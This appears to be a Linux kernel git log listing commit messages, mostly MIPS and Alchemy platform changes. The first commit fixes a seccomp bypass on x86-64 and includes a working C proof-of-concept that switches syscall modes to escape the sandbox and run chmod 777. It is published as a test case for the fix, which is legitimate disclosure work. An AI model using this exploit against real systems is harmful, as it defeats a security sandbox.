| Age | Commit message (Collapse) | Author |
|---|
|
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
|
This reverts commit 558d1de8ba9ebb1cc3f3062f1371b9330772164f.
|
|
Thanks to David Daney helping with debugging and testing.
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: David Daney <ddaney@caviumnetworks.com>
|
|
With a postfix decrement t reaches -1 rather than 0, so the fall-back will
not occur.
Signed-off-by: Roel Kluin <roel.kluin@gmail.com>
Cc: mano@roarinelk.homelinux.net
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Signed-off-by: David Daney <ddaney@caviumnetworks.com>
CC: Atsushi Nemoto <anemo@mba.ocn.ne.jp>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Architectures other than mips and x86 are not using ticket spinlocks.
Therefore, the contention on the lock is meaningless, since there is
nobody known to be waiting on it (arguably /fairly/ unfair locks).
Dummy it out to return 0 on other architectures.
Signed-off-by: Kyle McMartin <kyle@redhat.com>
Acked-by: Ralf Baechle <ralf@linux-mips.org>
Acked-by: Ingo Molnar <mingo@elte.hu>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
|
In Linus' current -git the cpumask member is now a pointer.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
This kernel symbol provides a way for drivers to switch on alternate
function for a certain GPIO pin. Turning it off is done implicitly when
changing the GPIO direction, as that would be fixed when using the given
pin als alternate function.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Remove the {set,get}_434_reg() prototypes, as the functions have been
removed. Also move the prototypes for {get,set}_latch_u5() to the correct
place.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
As rb532_dev3_ctl_res is not used by any platform device, it can be dropped
when not used for holding the physical address of the device 3 controller.
Also a size of one byte should suffice when ioremapping the physical
address mentioned above, as only a single byte is being read from and
written to it.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
These kernel symbols are unused. Also, since dev3 init has been moved to
devices.c, set_434_reg() breaks compiling as it uses dev3.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
This code doesn't belong to gpio.c, as it's completely unrelated to
GPIO. As dev1 and dev2 init code is in devices.c, it seems to be a more
adequate place.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
The data to be written is just a byte, so use writeb instead of writel.
Also, dev3.base contains the address, not the data so referencing here
is wrong.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
This register just contains the address of the actual resource, so
initialisation has to be the same as cf_slot0_res and nand_slot0_res.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
As the korina ethernet driver uses platform_get_drvdata() to extract the
driver specific data from the platform device, driver_data has to be
used here.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Auto-detection works just fine, so use it instead of specifying the type
manually. Also define a platform device for the uart, as suggested by
David Daney.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
As the pata-rb532-cf driver calls gpio_direction_input(), the calls to
rb532_gpio_set_func() and rb532_gpio_direction_input() are not needed since
the alternate function is automatically being disabled when changing the
GPIO pin direction.
The later two calls to rb532_gpio_set_{ilevel,istat}() are implicitly being
done by the IRQ initialisation of pata-rb532-cf.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
When a driver calls gpio_set_direction_{input,output}(), it obviously
doesn't want the alternate function for that pin to be active (as the
direction would not matter in that case). This patch ensures alternate
function is disabled when the direction is being changed.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Interrupt Group 4 mapps the GPIO pins enabled as interrupt sources;
add defines to make this clear when addressing them later in code.
The mapped GPIOs support triggering on either level high or low. To
achieve this, the set_type() function calls rb532_gpio_set_ilevel() for
interrupts of the above mentioned group.
As there is no way to alter the triggering characteristics of the other
interrupts, accept level triggering on status high only. (This is just a
guess; but as the system boots fine and interrupt-driven devices (e.g.
serial console) work with no implications, it seems to be right.)
To clear a GPIO mapped IRQ, the source has to be cleared (i.e., the
interrupt status bit of the corresponding GPIO pin). This is done inside
rb532_disable_irq().
After applying these changes I could undo most of my former "fixes" to
pata-rb532-cf. Particularly all interrupt handling can be done
generically via set_irq_type() as it was before.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
The code is rather based on trial-and-error than knowledge. Verified Via
Rhine functionality in PIO as well as MMIO mode.
[Looks sane -- Ralf]
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Tested-by: Florian Fainelli <florian@openwrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
The algorithm works unconditionally. If bitval is one, the first line is
a no op and the second line sets the bit at offset position. Vice versa,
if bitval is zero, the first line clears the bit at offset position and
the second line is a no op.
Signed-off-by: Phil Sutter <n0-1@freewrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
The previous definition inadvertently omits Octeon which currently is
treated as an architecture variant separate from MIPS32 and MIPS64.
Signed-off-by: David Daney <ddaney@caviumnetworks.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
If a context switch occurred between the watch exception and reading the
watch registers, it would be possible for the new process to corrupt their
state. Enabling interrupts only after the watch registers are read avoids
this race.
Signed-off-by: David Daney <ddaney@caviumnetworks.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
This fixes the ptrace ABI for watch registers, and should allow 64bit
kernels to use the watch register support.
Signed-off-by: David Daney <ddaney@caviumnetworks.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Add platform support to use rtc-tx4939 driver.
Signed-off-by: Atsushi Nemoto <anemo@mba.ocn.ne.jp>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
The special IP27 DMA code selected by DMA_IP27 has been removed a while
ago turning DMA_IP27 into almost a nop. Also fixup the broken logic of
its last users memcpy.S and memcpy-inatomic.s.
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
And while at it, convert all functions from macros to inline functions
for sanity.
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Signed-off-by: Huang Weiyi <weiyi.huang@gmail.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
This shaves of 1912 bytes of an IP27 defconfig kernel and avoids
unexpected overflow behaviour in atomic_sub_if_positive. Apply the same
changes to the atomic64_* functions for consistency.
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Original commit 1c0fe6e3bda0464728c23c8d84aa47567e8b716c.
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
See discussion e9c3a7c20901051031y528d0d31r18d44c5096c59e0@mail.gmail.com.
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Now that all EEPROM drivers live in the same place, let's harmonize
their symbol names.
Also fix eeprom's dependencies, it definitely needs sysfs, and is no
longer experimental after many years in the kernel tree.
Signed-off-by: Jean Delvare <khali@linux-fr.org>
Acked-by: Wolfram Sang <w.sang@pengutronix.de>
Cc: David Brownell <dbrownell@users.sourceforge.net>
|
|
* 'syscalls' of git://git390.osdl.marist.edu/pub/scm/linux-2.6: (44 commits)
[CVE-2009-0029] s390 specific system call wrappers
[CVE-2009-0029] System call wrappers part 33
[CVE-2009-0029] System call wrappers part 32
[CVE-2009-0029] System call wrappers part 31
[CVE-2009-0029] System call wrappers part 30
[CVE-2009-0029] System call wrappers part 29
[CVE-2009-0029] System call wrappers part 28
[CVE-2009-0029] System call wrappers part 27
[CVE-2009-0029] System call wrappers part 26
[CVE-2009-0029] System call wrappers part 25
[CVE-2009-0029] System call wrappers part 24
[CVE-2009-0029] System call wrappers part 23
[CVE-2009-0029] System call wrappers part 22
[CVE-2009-0029] System call wrappers part 21
[CVE-2009-0029] System call wrappers part 20
[CVE-2009-0029] System call wrappers part 19
[CVE-2009-0029] System call wrappers part 18
[CVE-2009-0029] System call wrappers part 17
[CVE-2009-0029] System call wrappers part 16
[CVE-2009-0029] System call wrappers part 15
...
|
|
Add swab.h to kbuild.asm and remove the individual entries from
each arch, mark as unifdef as some arches have some kernel-only
bits inside.
Signed-off-by: Harvey Harrison <harvey.harrison@gmail.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
|
This way it matches the generic system call name convention.
Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com>
|
|
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Replace the current sysctl-based suspend interface with a new sysfs-
based one which also uses the Linux-2.6 suspend model.
To configure wakeup sources, a subtree for the demoboards is created
under /sys/power/db1x:
sys/
`-- power
`-- db1x
|-- gpio0
|-- gpio1
|-- gpio2
|-- gpio3
|-- gpio4
|-- gpio5
|-- gpio6
|-- gpio7
|-- timer
|-- timer_timeout
|-- wakemsk
`-- wakesrc
The nodes 'gpio[0-7]' and 'timer' configure the GPIO0..7 and M2
bits of the SYS_WAKEMSK (wakeup source enable) register. Writing '1'
enables a wakesource, 0 disables it.
The 'timer_timeout' node holds the timeout in seconds after which the
TOYMATCH2 event should wake the system.
The 'wakesrc' node holds the SYS_WAKESRC register after wakeup (in hex),
the 'wakemsk' node can be used to get/set the wakeup mask directly.
For example, to have the timer wake the system after 10 seconds of sleep,
the following must be done in userspace:
echo 10 > /sys/power/db1x/timer_timeout
echo 1 > /sys/power/db1x/timer
echo mem > /sys/power/sleep
This patch also removes the homebrew CPU frequency switching code. I don't
understand how it could have ever worked reliably; it does not communicate
the clock changes to peripheral devices other than uarts.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
create mode 100644 arch/mips/alchemy/devboards/pm.c
|
|
Implement suspend/resume for DBDMA controller and its channels.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Au1550/Au1200 have a different memory controller which requires additi-
onal code to properly put memory to sleep (code taken from AMD/RMI's
Linux-2.6.11 source package).
Also fix up the remaining pm-related paths to compile on Au1200/Au1550
platforms.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Now that nothing in time.c depends on calc_clock, it can
be moved to clocks.c where it belongs.
While at it, give it a better non-generic name and call it
as soon as possible in plat_mem_init.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Add support for the 32 kHz counter1 (RTC) as clocksource / clockevent
device. As a nice side effect, this also enables use of the 'wait'
instruction for runtime idle power savings.
If the counters aren't enabled/working properly, fall back on the
cp0 counter clock code.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
The current mips clock build infrastructure lets a system only use
either the MIPS cp0 counter or a SoC specific timer as a clocksource /
clockevent device.
This patch renames the core cp0 counter clocksource / clockevent functions
from mips_* to r4k_* and updates the wrappers in asm-mips/time.h to
call these renamed functions instead.
Chips which can detect whether it is safe to use a chip-specific timer
can now fall back on the cp0 counter if necessary and possible
(e.g. Alchemy with a follow-on patch).
Existing behaviour is not changed in any way.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Remove the cpu_table:
- move detection of whether c0_config[OD] is read-only and should be set
to fix various chip errata to au1000 headers.
- move detection of write-only sys_cpupll to au1000 headers.
- remove the BCLK switching code: Activation of this features should be
left to the boards using the chips since it also affects external devices
tied to BCLK, and only the board designers know whether it is safe to
enable.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
delete mode 100644 arch/mips/alchemy/common/cputable.c
|
|
There are no in-tree users, so remove them.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Add the name set by set_irq_chip_and_handler_name() to the output of
/proc/interrupts, like so:
db1200 ~ # cat /proc/interrupts
CPU0
8: 52 Alchemy-IC0-hilevel serial
10: 171 Alchemy-IC0-hilevel au1xxx-mmc
11: 47 Alchemy-IC0-hilevel Au1xxx dbdma
18: 1 Alchemy-IC0-hilevel au1550-spi
29: 1250997 Alchemy-IC0-riseedge timer
37: 211 Alchemy-IC0-hilevel ehci_hcd:usb1, ohci_hcd:usb2
38: 0 Alchemy-IC0-hilevel lcd
72: 2623 DB1200 CPLD-level ide0
73: 257 DB1200 CPLD-level eth0
84: 1 DB1200 CPLD-level sd_insert
85: 0 DB1200 CPLD-level sd_eject
ERR: 0
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
Tested on Db1200.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
|
This patch attempts to modernize core Alchemy interrupt handling code.
- add irq_chips for irq controllers instead of irq type,
- add a set_type() hook to change irq trigger type during runtime,
- add a set_wake() hook to control GPIO0..7 based wakeup,
- use linux' IRQF_TRIGGER_ constants instead of homebrew ones,
- enable GENERIC_HARDIRQS_NO__DO_IRQ.
- simplify plat_irq_dispatch
- merge au1xxx_irqmap into irq.c file, the only place where its
contents are referenced.
- board_init_irq() is now mandatory for every board; use it to register
the remaining (gpio-based) interrupt sources; update all boards
accordingly.
Run-tested on Db1200 and other Au1200 based platforms.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
delete mode 100644 arch/mips/alchemy/common/au1xxx_irqmap.c
|
|
Not every alchemy-based board might want these options forced on it,
and most of this stuff seems to be intended for devboard code anyway.
Remove commandline mangling code out of common chip code and instead
add relevant sections to all in-tree boards to not change existing
behaviour.
Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
|
